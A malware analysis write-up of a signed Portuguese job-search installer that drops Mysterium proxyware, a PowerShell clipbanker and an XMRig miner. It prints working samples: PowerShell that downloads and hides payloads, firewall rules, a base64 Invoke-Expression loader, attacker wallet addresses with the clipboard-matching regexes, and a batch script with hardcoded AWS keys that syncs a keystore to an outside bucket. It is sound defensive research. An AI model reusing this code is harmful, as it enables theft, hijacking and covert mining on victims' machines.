Signed job search application deploys a Proxyware, ClipBanker and XMRig cryptominer

07/02/2026 · ~17 min read
advancedinstallersignedevasionghidraproxywareclipbankerminercryptominerxmrigmalware analysis
Sponsored By Hudson Rock

Hudson Rock offers a free cybercrime (including infostealers) intelligence. Thanks to their support I can spend more time creating valuable content.

Online sandbox analysis

I came across this post on Reddit where someone shared the VirusTotal link and requested help with removing it and mitigating the consequences.

VT scan

Judging purely from some of the SIGMA rules we can confirm this is malicious:

  • Powershell Base64 Encoded MpPreference Cmdlet - Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
  • Windows Defender Exclusions Added - PowerShell -Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions

There is, of course, no need for a job search software to manipulate with Windows Defender.

I looked the file up on Threat.rip, a very nice website that bulk submits the file to services such as AnyRun, VirusTotal, Hybrid Analysis, UnpacMe and few more.

Let's check the AnyRun - generally my go-to sandboxes are VirusTotal, AnyRun and Triage.

AnyRun

I got overwhelmed by the amount of flags this triggered but one stands out in particular and that is the Detects AdvancedInstaller (YARA) signature. This will save us plenty of time when getting to the next stage of this malware.

Static extraction of main payload(s)

Just like before, we are going to be using a Windows 10 FlareVM. FlareVM. You can find FlareVM here

I downloaded the sample from AnyRun, extracted it and renamed temporarily to CadastrarCurriculo.exe.infected just so I don't execute it by accident.

I decided to use a Python script to extract Advanced Installer files available at this GitHub link.

advancedinstaller extraction

advancedinstaller extraction

Now we extracted the CadastrarCurriculo.ini configuration file and a folder that contains a ZIP archive that contains an executable named drum roll CadastrarCurricolo.msi (VirusTotal).

advancedinstaller extraction

I tried inspecting the MSI package with LessMSI just like I did previously but I was surprised to see that there were no files bundled inside.

I researched and found MsiDb.exe - learn.microsoft.com, but unfortunately that return anything for me either.

DiE

DetectItEasy identified several PE's available in the MSI, so there had to be something. I found Orca - a database table editor for creating and editing Windows Installer packages and merge modules - learn.microsoft.com where I was finally able to find the hidden PE's and other, additional information.

Extracted MSI package

Seems like AdvancedInstaller was also used for the MSI package.

DiE

Here we have some download links, filepaths and filenames. We will be looking at these a little later.

DiE

Here we have the scheduled tasks it creates for the files we just discovered.

DiE

Here we have embedded binaries in the MSI. I was able to extract them and save them by right clicking the line and writing it on disk.

Malicious URL discovery

DiE

Here we have a viewer.exe mention and a possibly malicious URL. 

https[:]//vagasflix.com/og.php?u=/cl/i/melo5w

This seems like some C2/or other related URL. While observing this malware's behavior in AnyRun sandbox, the URL was opened in the web browser.

Nevertheless, to this URL find, I found out about this thread:

https://www.reddit.com/r/golpe/comments/1mdk428/%C3%A9_seguro_executar_arquivos_exe/?tl=en

It seems like the malware was active at minimum for 7 months and that this URL that is indeed acting like a job searching website is actually a malware delivery website.

When we look at communicating files for the malicious URL, we can see many of these CadastrarCurriculo.exe files - same filename as the file we discovered.

https://www.virustotal.com/gui/domain/vagasflix.com/relations

After rescanning some of the files, all are identified by ESET as the same signature - PowerShell/TrojanDownloader.Agent.PCS Trojan which is the same as the file we are analyzing. With this info, we can assume that the VagasFlix URL is indeed a malicious site constructed primarily for delivering this signed malware.

Confirmed by this AnyRun scan where the one of the users opened the malicious URL and clicked themselves to the known CadastrarCurriculo.exe filename .

VagasFlix opened URL

When opened by the viewer.exe component, the URL just displays a bunch of buttons that lead to various (likely sponsored) products.

Continuing through extracted MSI package

directory declarations

Here we have the declared directories this malware uses.

VM check

Here we have a VM check. Not sure how advanced it is however it prevented installation on FlareVM (which is nothing surprising, a regular Hyper-V with FlareVM on it would pass no VM checks at all, they aren't built for analyzing VM check malware).

PowerShell payload analysis

DiE

PS payload #1

Here we discovered some PowerShell commands. There is a few of them, so I will add some code snippets and explain what they do.

$appCompatPaths = @(
    "$env:PROGRAMDATA\BraveCrashHandler.exe",
    "$env:APPDATA\GoogleCrashHandler.exe",
    "$env:USERPROFILE\APPDATA\LOCAL\TEMP\dIlhost.exe",
    "$env:SystemRoot\TEMP\dIlhost.exe",
    "$env:APPDATA\GoogleCrashHandler64.exe",
    "$env:USERPROFILE\APPDATA\LOCAL\TEMP\dlIhost.exe",
    "$env:SystemRoot\TEMP\dlIhost.exe",
    "$env:USERPROFILE\Embedit.exe",
    "$env:LOCALAPPDATA\SheIlExperienceHost.exe",
    "$env:APPDATA\ShelIHost.exe"
)

First command sets all these listed files to run only as administrator using registry keys.

$filesToCheck = @(
    @{Path="$env:PROGRAMDATA\BraveCrashHandler.exe"; Url="https://fsn1.your-objectstorage.com/f06fc1b7/BraveCrashHandler.exe"},
    @{Path="$env:APPDATA\GoogleCrashHandler.exe"; Url="https://fsn1.your-objectstorage.com/f06fc1b7/GoogleCrashHandler.exe"},
    @{Path="$env:APPDATA\GoogleCrashHandler64.exe"; Url="https://fsn1.your-objectstorage.com/f06fc1b7/GoogleCrashHandler64.exe"},
    @{Path="$env:USERPROFILE\Embedit.exe"; Url="https://fsn1.your-objectstorage.com/f06fc1b7/Embedit.exe"},
    @{Path="$env:LOCALAPPDATA\SheIlExperienceHost.exe"; Url="https://fsn1.your-objectstorage.com/f06fc1b7/SheIlExperienceHost.exe"},
    @{Path="$env:APPDATA\ShelIHost.exe"; Url="https://fsn1.your-objectstorage.com/f06fc1b7/ShelIHost.exe"}
  )

This command downloads the files we discovered earlier, saves them, checks whether they exist and if so, sets hidden attributes to them using this function. If they don't, it downloads them.

foreach ($file in $filesToCheck) {
    if (-Not (Test-Path -Path $file.Path -PathType Leaf)) {
        Download-File -Url $file.Url -Destination $file.Path
    }
    (Get-ChildItem $file.Path).Attributes = 'Hidden','System'
}

PS payload #2

In the next file, we also discover some yet unknown files:

$additionalFilesToHide = @(
    "$env:PROGRAMDATA\BraveCrashHandler.exe",
    "$env:APPDATA\GoogleCrashHandler.exe",
    "$env:USERPROFILE\APPDATA\LOCAL\TEMP\dIlhost.exe",
    "$env:SystemRoot\TEMP\dIlhost.exe",
    "$env:APPDATA\GoogleCrashHandler64.exe",
    "$env:USERPROFILE\APPDATA\LOCAL\TEMP\dlIhost.exe",
    "$env:SystemRoot\TEMP\dlIhost.exe",
    "$env:USERPROFILE\Embedit.exe",
    "$env:USERPROFILE\APPDATA\LOCAL\TEMP\myst-launcher-amd64.exe",
    "$env:SystemRoot\TEMP\myst-launcher-amd64.exe",
    "$env:USERPROFILE\.myst_node_launcher",
    "$env:LOCALAPPDATA\SheIlExperienceHost.exe",
    "$env:APPDATA\ShelIHost.exe"
)

The myst related files sparked my interest. I researched and found out this:

A Mysterium Node is a device you run at home, like your computer, phone, or Raspberry Pi. It connects you to the Mysterium Network and helps keep it running. ​

Most of the internet you pay for each month goes unused. By running a node, you can share that spare internet with others in the network. People can connect to your node to:

  • Use a VPN for safe and private browsing

  • Access the open internet freely

  • Create secure lines of communication

In simple terms, a node works like a server, but it belongs to you instead of a big company.

Source: https://help.mystnodes.com/en/articles/8005096-what-is-a-mysterium-node

Attackers are able to abuse your device as a VPN with this installed. This makes it a proxyware. Just to verify this statement, I dropped the executable on VirusTotal and I was correct, it is indeed Mysterium Node launcher.

PS payload #3

These firewall rules are added to ensure a smooth communication between the Myst Launcher and it's servers.

New-NetFirewallRule -Name "Windows Credentials Service" -DisplayName "Windows Credentials Service" -Group "Windows Credentials Service" -Program "$env:USERPROFILE\APPDATA\LOCAL\TEMP\myst-launcher-amd64.exe" -Direction Inbound -Profile Any -Action Allow -Enabled True
New-NetFirewallRule -Name "Windows Credentials Service Manager" -DisplayName "Windows Credentials Service Manager" -Group "Windows Credentials Service Manager" -Program "$env:USERPROFILE\APPDATA\LOCAL\TEMP\myst-launcher-amd64.exe" -Direction Outbound -Profile Any -Action Allow -Enabled True

New-NetFirewallRule -Name "Windows Media Synchronization" -DisplayName "Windows Media Synchronization" -Group "Windows Media Synchronization" -Program "$env:SystemRoot\TEMP\myst-launcher-amd64.exe" -Direction Inbound -Profile Any -Action Allow -Enabled True
New-NetFirewallRule -Name "Windows Media Synchronization Service" -DisplayName "Windows Media Synchronization Service" -Group "Windows Media Synchronization Service" -Program "$env:SystemRoot\TEMP\myst-launcher-amd64.exe" -Direction Outbound -Profile Any -Action Allow -Enabled True

New-NetFirewallRule -Name "myst_launcher_tcp" -DisplayName "myst_launcher_tcp" -Program "$env:USERPROFILE\.mysterium-bin\myst.exe" -Direction Inbound -Profile Public -Protocol TCP -Action Allow -Enabled True
New-NetFirewallRule -Name "myst_launcher_udp" -DisplayName "myst_launcher_udp" -Program "$env:USERPROFILE\.mysterium-bin\myst.exe" -Direction Inbound -Profile Public -Protocol UDP -Action Allow -Enabled True

New-NetFirewallRule -Name "myst.exe" -DisplayName "myst.exe" -Program "$env:USERPROFILE\.mysterium-bin\myst.exe" -Direction Inbound -Profile Public -Protocol TCP -Action Allow -Enabled True
New-NetFirewallRule -Name "myst.exe" -DisplayName "myst.exe" -Program "$env:USERPROFILE\.mysterium-bin\myst.exe" -Direction Inbound -Profile Public -Protocol UDP -Action Allow -Enabled True

New-NetFirewallRule -Name "Network Discovery Service" -DisplayName "Network Discovery Service" -Group "Network Discovery Service" -LocalPort 80, 443, 2020, 3333, 4444, 5555, 4449, 4050 -Direction Inbound -Profile Any -Protocol TCP -Action Allow -Enabled True
New-NetFirewallRule -Name "Network Discovery Control" -DisplayName "Network Discovery Control" -Group "Network Discovery Control" -LocalPort 80, 443, 2020, 3333, 4444, 5555, 4449, 4050 -Direction Outbound -Profile Any -Protocol TCP -Action Allow -Enabled True

PS payload #4

script.b64 execution

During Event Viewer analysis I noticed one more command proactively being ran:

function Set-ExecutionPolicy { param([Parameter(ValueFromRemainingArguments=$true)][object[]]$args) }; $ProgressPreference = 'SilentlyContinue'; $PollMs = 1000; $b = Get-Content 'C:\Users\rift\Desktop\script.b64' -Raw; $c = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)); Invoke-Expression $c

This means there had to exist the file C:\Users\rift\Desktop\script.b64 at some point. You now may ask why would it be on desktop (because it would be blatant to the user) and that is because I started the unpack executable on desktop, therefore it assumes that desktop is it's main directory.

script.b64

I looked into Event Viewer once again and I was able to discover the executed script. It is a one of the more sophisticated clipbanker malware.

 $Messages = @{
  '*'        = '0xbae44Bc0aa9CC20B8CFa112D9Ad3b43Ef9B0C3fE'
  EVM        = '0xbae44Bc0aa9CC20B8CFa112D9Ad3b43Ef9B0C3fE'
  BTC_TAP    = 'bc1ps7ma79me3a0f0n40k4mdsmlz968f7mv73v3vz7f4c9vha8lhsfjqukmr7d'
  BTC_BECH   = 'bc1q307qxe4hpf6ye82477f42c6nsgezvz6gfm2z5x'
  BTC_P2SH   = '3QnHvEvvP8jBBVvug5pcT7oUjgKgXeDB9j'
  BTC_P2PKH  = '1Hj4coh59fFsydhttH5h9iMWSwPgtkYHz'
  BNB        = '0xbae44Bc0aa9CC20B8CFa112D9Ad3b43Ef9B0C3fE'
  SOL        = '4KMHsMauguHCb1pM1AeVCAFumY3wbMAiMHmyYX4Nd897'
  DOT        = '16S2ZD6BAonoHCyDPeXe8fXVCBRebqEDsXmKRd7tkTqjdGmJ'
  ADA        = 'addr1q8g8symm53utkluxt0l6hra40xxvsqd5tqyqw038suy8wuack7nf2vh437swuszyvazs9jwny9243hq3wpvt6uceqpqsfqd5pz'
  TRX        = 'TJzYHaewZTbWMdrwZE366hBfCQLvV8SHSt'
  TRX_HEX    = 'TJzYHaewZTbWMdrwZE366hBfCQLvV8SHSt'
  XMR        = '85kVoW2pdB9b5HiXxV3wd1jWyV1keE4guQvRvsXxcxg8EpELGt2i44QZ77iKSiZRQsDEG1TsLL2aHXvgDExUUbQE73W6Bv8'
  XMR_INT    = '85kVoW2pdB9b5HiXxV3wd1jWyV1keE4guQvRvsXxcxg8EpELGt2i44QZ77iKSiZRQsDEG1TsLL2aHXvgDExUUbQE73W6Bv8'
  AVAX_X     = 'avax1wqnrr4yq50nca7gqnm9fy86kt5hnanu7f2dzdw'
  AVAX_P     = 'avax1wqnrr4yq50nca7gqnm9fy86kt5hnanu7f2dzdw'
  XRP        = 'radBzBhjivekXKj1atfLjAiayRpX1vHd62'
  DOGE       = 'DEQiqiHi4riypyFWpWPsQDwhcHHyR1xEyM'
  TON        = 'UQBfOeiQb_z46KWjf4U5nA1TGVuetFkbedLxL1fwTYC9WQ8c'
  BCH        = 'qrsnpnz8f6exm2n9dr5ldxmtlnvr22r3cg3tlj8zuc'
}

Here we have the attackers hardcoded wallets it will be replacing the original one with.

$Rules = @(
  @{ Name='BTC_TAP';   Pattern='^(?i:bc1p[ac-hj-np-z02-9]{58,74})$'; Validate={ param($s) (Test-BTC-Bech32 $s) } }
  @{ Name='BTC_BECH';  Pattern='^(?i:bc1q[ac-hj-np-z02-9]{25,74})$'; Validate={ param($s) (Test-BTC-Bech32 $s) } }
  @{ Name='BTC_P2SH';  Pattern='^3[1-9A-HJ-NP-Za-km-z]{25,34}$';     Validate={ param($s) (Test-Base58Check $s) } }
  @{ Name='BTC_P2PKH'; Pattern='^1[1-9A-HJ-NP-Za-km-z]{25,34}$';     Validate={ param($s) (Test-Base58Check $s) } }
  @{ Name='SOL';       Pattern='^[1-9A-HJ-NP-Za-km-z]{32,44}$';       Validate={ param($s) (Test-SOL-Base58Len32 $s) } }
  @{ Name='EVM';       Pattern='^(?i:0x[0-9a-f]{40})$';               Validate={ param($s) $true } }
  @{ Name='DOT';       Pattern='^[1-9A-HJ-NP-Za-km-z]{47,48}$';       Validate={ param($s) $true } }
  @{ Name='ADA';       Pattern='^(?i:(addr1|stake1)[0-9a-z]{20,})$';  Validate={ param($s) (Test-ADA-Bech32 $s) } }
  @{ Name='TRX';       Pattern='^T[1-9A-HJ-NP-Za-km-z]{33}$';         Validate={ param($s) (Test-Base58Check $s) } }
  @{ Name='TRX_HEX';   Pattern='^41[0-9a-fA-F]{40}$';                 Validate={ param($s) $true } }
  @{ Name='XMR';     Pattern='^(?:4|8)[1-9A-HJ-NP-Za-km-z]{94}$';   Validate={ param($s) $true } }
  @{ Name='XMR_INT'; Pattern='^4[1-9A-HJ-NP-Za-km-z]{105}$';        Validate={ param($s) $true } }
  @{ Name='AVAX_X';    Pattern='^(?i:X-avax1[0-9a-z]{39})$';          Validate={ param($s) (Test-AVAX-Bech32 $s) } }
  @{ Name='AVAX_P';    Pattern='^(?i:P-avax1[0-9a-z]{39})$';          Validate={ param($s) (Test-AVAX-Bech32 $s) } }
  @{ Name='XRP';       Pattern='^r[1-9A-HJ-NP-Za-km-z]{24,34}$';      Validate={ param($s) (Test-Base58Check $s) } }
  @{ Name='DOGE';      Pattern='^D[1-9A-HJ-NP-Za-km-z]{25,34}$';      Validate={ param($s) (Test-Base58Check $s) } }
  @{ Name='TON';       Pattern='^[EU]Q[A-Za-z0-9_-]{46}$';            Validate={ param($s) $true } }
  @{ Name='BNB';       Pattern='^bnb[0-9a-z]{39}$';                   Validate={ param($s) $true } }
  @{ Name='BCH';       Pattern='^(?i:(bitcoincash:)?[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{42,})$'; Validate={ param($s) $true } }
)

Here we have the Regex patterns it uses to find the correct address.

It's great to note it checks whether the copied string length is <25 or >200 it ignores it to optimize CPU usage. The actual check goes like:

  1. Checks if it looks like a for ex. bitcoin address using regex
  2. Checks if the checksum is mathematically correct (yes, this is an actual thing)
  3. 250 milliseconds pause and back to number 1

There was 1 more PowerShell file present, however it's only purpose was sanitizing the input so I decided not to include it.

MSI packed files analysis

So, we extracted the PE files inside the MSI using Orca. It's time to inspect them. file * on folder

We can see few icons, DLL's, bitmap images and an executable. Icons are indeed icons, images are indeed images so we are left with the DLL's & EXE.

sigcheck on folder

I started running sigcheck on the EXE/DLL files and it seems like all are components of Advanced Installer. I double checked the certificate and it is indeed from Advanced Installer.

To my surprise, all the files were signed by Advanced Installer.

sigcheck on folder 2

Even this viewer.exe file... Or maybe not? See the publisher? Same publisher as the original executable and it doesn't match the other legitimate AdvancedInstaller components that are published by "Caphyon SRL".

A real question is why was the viewer.exe signed by this fake company. In the execution chain, it doesn't serve any other purpose than to launch a URL and so does the official version from AI.

It's been mentioned here and here that official AdvancedInstaller also contains this viewer.exe file. My theory here is that the file is signed because ultimately without a valid signature that was displayed on the legitimate viewer.exe it received false flags from less-known AV software, so this is their way to ultimately evade detection even by signing an already legitimate file.

Ghidra analysis of viewer.exe

I decided to analyse the file in Ghidra. There is no malicious functionality indeed and it seems to do exactly what it promised. I won't be going deep in showing the process of reversing it in Ghidra, it was a boring process with no sudden realizations - it was just confirmation of what I already thought.

Extracted strings:

\SystemTemp\
ntdll.dll
open
runas
%s\System32\cmd.exe
.cmd
.bat
/C ""%s" %s"
ShellExecuteInfo members:
FilePath:<
Verb:<
Directory:<
Parameters:<
Visible
Hidden
Window Visibility:
true
false
Call to ShellExecuteEx() returned:
Last error=
Invalid SID
kernel32
\\?\UNC\
\\?\
*.*
url
URL
URL Shortcut content:
http
mailto
> returned:
Call to ShellExecute() for verb<
0123456789abcdefghjkmnpqrstvwxyz
e!%x
/DIR 
/DontWait 
/EnforcedRunAsAdmin 
/RunAsAdmin 
/HideWindow
/LogFile
msiexec.exe

Ghidra URLcheck

Here we have a function to check if URL is valid

Ghidra URLcheck

Here is the function to check for the http/mailto

Ghidra URLcheck

Here we have the switches themselves in settings. This was ultimately just the determination whether the switch was used or not.

Ghidra URLcheck

Here is the actual main function to start a CMD window with the arguments that will determine what starts, if it starts hidden etc.

Downloaded payloads analysis

So, we went over:

  • the binary files in the MSI
  • the suspicious DLL signed by the high risk certificate
  • the PowerShell commands and the clipbanker

Now, only the 4 downloaded payloads are remaining!

Filename SHA256 hash VirusTotal
Embedit.exe ea50ee52fc0db2cab8f51d62c3e50a8854e74deb250d5bfc4d99ab50c559a091 VT Link
GoogleCrashHandler.exe 4ec2951bcfa225865a2582c2f0e84d52cc3031e299cbaed119861c58d6a503c4 VT Link
GoogleCrashHandler64.exe b9a3a3fb5d23537d37d4cf411bc45815261e7f80bb6c455bc6e01086aecd7db1 VT Link
SheIlExperienceHost.exe ca2efda753d4894612238e32370471b8cd514f4ea548e23dbf00429f4a7a4d81 VT Link

Just based on the VirusTotal scan, we can tell they are all packed by Enigma - Win64/Packed.Enigma.DS Trojan and we can also confirm this by running DetectItEasy on them:

DiE

Unpacking modern Enigma Protector is a very complicated and a long process, which it outside the scope of this report. During string analysis of all 4, I noticed something very interesting that all 4 files shared:

str1

str2

A string that indicated a URL that belongs to Quick Batch File Compiler - https://www.abyssmedia.com/quickbfc. Most of these batch to executable convertors work similiarly like a dropper:

  1. Executable drops embedded batch file most of the time in %temp% folder
  2. Executable calls the batch file
  3. Executable deletes the batch file once done

To my surprise, this was no different. I started the executables 1 by 1, suspended the process instantly and I successfully returned 3 batch files and 1 executable from the %temp% folder. We are going to assume that this is the only payload because of the specific string we found that allows only to bundle files and because at any point of the dynamic analysis they did not perform any other malicious activity other than dropping a file.

Filename SHA256 hash VirusTotal
0N1VQNPQ.bat bd52c55e005878726fa1ba1f55bd608cb78dbb254535e8c61c215b5f6f6b29bc VT Link
804T5D75.bat 7c62c55eb84f41e303815a5b23cabb14d1f3419deae098e55622f8c037b6fc5a VT Link
0JMQJ1F5.bat 581cf1ccebc59f9ff246413a8e1b685c04631b0edf0462ba87c6adbc8fce4e6f VT Link
dlIhost.exe a69a4a3ac2f8dcc168a17e1b07a839e268f8871fe63b9b56c306205f9d733ecf VT Link

Batch file #1

The first file is responsible for the Myst Launcher starting, configuration and checking that it is executed.

:B
set MyProcess=myst-launcher-amd64.exe
tasklist | findstr /i "%MyProcess%"
if errorlevel 1 (
    goto :StartRoutine
)
timeout /t 60
goto :B

:StartRoutine
timeout /t 10

if exist "%Temp%\myst-launcher-amd64.exe" (
    start "" "%Temp%\myst-launcher-amd64.exe" -autorun
) else (
    if exist "%SystemRoot%\Temp\myst-launcher-amd64.exe" (
        start "" "%SystemRoot%\Temp\myst-launcher-amd64.exe" -autorun
    )
)

They also contain hardcoded AWS keys:

"%UserProfile%\.mysterium-docs\aws.exe" configure set AWS_ACCESS_KEY_ID IYUS2SYTE3E7DZID2U61
"%UserProfile%\.mysterium-docs\aws.exe" configure set AWS_SECRET_ACCESS_KEY 1gZpIsVZg63zyQyRjkgzfAdHsT1CpIkwcoBow9nh
"%UserProfile%\.mysterium-docs\aws.exe" --endpoint-url="https://fsn1.your-objectstorage.com" s3 sync "%UserProfile%\.mysterium-node\keystore" s3://d4fb01c2

Batch file #2

Second batch file is responsible for managing the %SystemRoot%\Temp\dIlhost.exe - restarting it if it gets terminated.

@shift
@echo off
chcp 65001 >nul

:LOOP
tasklist /fi "IMAGENAME eq dIlhost.exe" | find /i "dIlhost.exe" >nul
if errorlevel 1 goto :StartRoutine
timeout /t 60 >nul
goto :LOOP

:StartRoutine
if exist "%Temp%\dIlhost.exe" (
    "%Temp%\dIlhost.exe"
) else if exist "%SystemRoot%\Temp\dIlhost.exe" (
    "%SystemRoot%\Temp\dIlhost.exe"
)
timeout /t 60 >nul
goto :LOOP

note: whole source code

The @shift on top is a very common thing with the batch -> exe convertors.

Batch file #3

And as for the last batch file:

@shift
@echo off
setlocal

powershell -NoProfile -ExecutionPolicy Bypass -Command "function Set-ExecutionPolicy { param([Parameter(ValueFromRemainingArguments=$true)][object[]]$args) }; $ProgressPreference = 'SilentlyContinue'; $PollMs = 1000; $b = Get-Content '%~dp0script.b64' -Raw; $c = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)); Invoke-Expression $c"

endlocal
pause

We have already analyzed this command - starts the script.b64 from the it's own filepath directory.

Executable file

xmrig

The dlIhost.exe executable isn't that interesting either. It has been dropped by the GoogleCrashHandler64.exe and it is a regular XMRig cryptominer.

We can see whole execution chain and identification on this AnyRun scan. Not to mention, on VirusTotal's behavior we can also spot:

-   C:\Users\<USER>\.config\xmrig.json
-   C:\Users\<USER>\.xmrig.json

Final verdict

We've went through many payloads. It's time to recap what we looked at.

This is a multi-payload, almost undetected malware with a valid digital signature (34.028.832 HIGOR PEREIRA MORAIS) distributed via a fake job search website with the payloads consisting of:

  • proxyware - abuses legitimate software called Mysterium Node, will result in the network being used as a residential proxy/VPN
  • clipbanker - using PowerShell and advanced mathematics checksum that support up to 20 wallets it is able to proactively monitor and replace cryptowallets in your clipboard
  • cryptojacker - an XMRig cryptomining malware is deployed and persistently being restarted using a batch script

The file is slowly gaining detections and after contacting Squiblydoo - owner of https://certgraveyard.org/ the certificate is now revoked.

IoC

Files:

Filename SHA256 Hash Description VirusTotal Link
CadastrarCurriculo.exe 21e06c9ee37d2da327b5d2c8bea6d68d9674ab8b2243005ffb3e8ef7b8965675 Signed, first stage of AdvancedInstaller VT Link
CadastrarCurriculo.msi 8d37465dd2b8c0d208093a583c900dc4b2bfa4dee2de12b1959a3541ff8eb1a5 Signed, second stage AdvancedInstaller dropper & loader VT Link
Embedit.exe ea50ee52fc0db2cab8f51d62c3e50a8854e74deb250d5bfc4d99ab50c559a091 Enigma-packed executable responsible for Myst Launcher configuration and start VT Link
GoogleCrashHandler.exe 4ec2951bcfa225865a2582c2f0e84d52cc3031e299cbaed119861c58d6a503c4 Komponenta pro persistence a stahování dalších modulů. VT Link
GoogleCrashHandler64.exe b9a3a3fb5d23537d37d4cf411bc45815261e7f80bb6c455bc6e01086aecd7db1 Responsible for dropping XMRig cryptominer (dlIhost.exe) VT Link
SheIlExperienceHost.exe ca2efda753d4894612238e32370471b8cd514f4ea548e23dbf00429f4a7a4d81 Responsible for dropping and executing PowerShell ClipBanker VT Link
dlIhost.exe a69a4a3ac2f8dcc168a17e1b07a839e268f8871fe63b9b56c306205f9d733ecf XMRig cryptominer VT Link
myst-launcher-amd64.exe 84f41a3516629d92f2dbd7bc287dd61db2a8992da3edc0982db9002eef4043fb Mysterium Node launcher VT Link
viewer.exe 1259486122934390eedf60d24fb91da16a738146460a93ee57b8cb8ea9a27a71 Legitimate viewer but signed by the malicious cert, used to start the ad server after installation, does not exhibit other malicious behaviour VT Link
0N1VQNPQ.bat bd52c55e005878726fa1ba1f55bd608cb78dbb254535e8c61c215b5f6f6b29bc Mysterium Node configuration script VT Link
804T5D75.bat 7c62c55eb84f41e303815a5b23cabb14d1f3419deae098e55622f8c037b6fc5a XMRig watchdog. VT Link
0JMQJ1F5.bat 581cf1ccebc59f9ff246413a8e1b685c04631b0edf0462ba87c6adbc8fce4e6f PowerShell loader for clipbanker. VT Link
script.b64 f9b700a5c6816fd0899892c4667d08df8f90c8b648f7d45ac019d5097957d337 Clipbanker VT Link

URL's:

URL Type Description
vagasflix.com Delivery URL Main, legitimate looking Portuguese job search site
https[:]//vagasflix.com/og.php?u=/cl/i/melo5w Ad display URL URL opened by viewer that displays various ads
https[:]//fsn1.your-objectstorage.com/f06fc1b7/ Payload delivery S3 bucket where payload components are downloaded from
https[:]//fsn1.your-objectstorage.com Exfiltration endpoint Endpoint used to exfiltrate the keystore folder from Mysterium Node
xmr.shinrarigs.com Miner pool XMRig miner pool
gulf.moneroocean.stream Miner pool XMRig miner pool
xmr2.shinrarigs.com Miner pool XMRig miner pool

Digital signatures

Name Description
34.028.832 HIGOR PEREIRA MORAIS High risk certificate used for this malware

Thank you for reading my analysis.

Want to learn more?

View my about me View all reports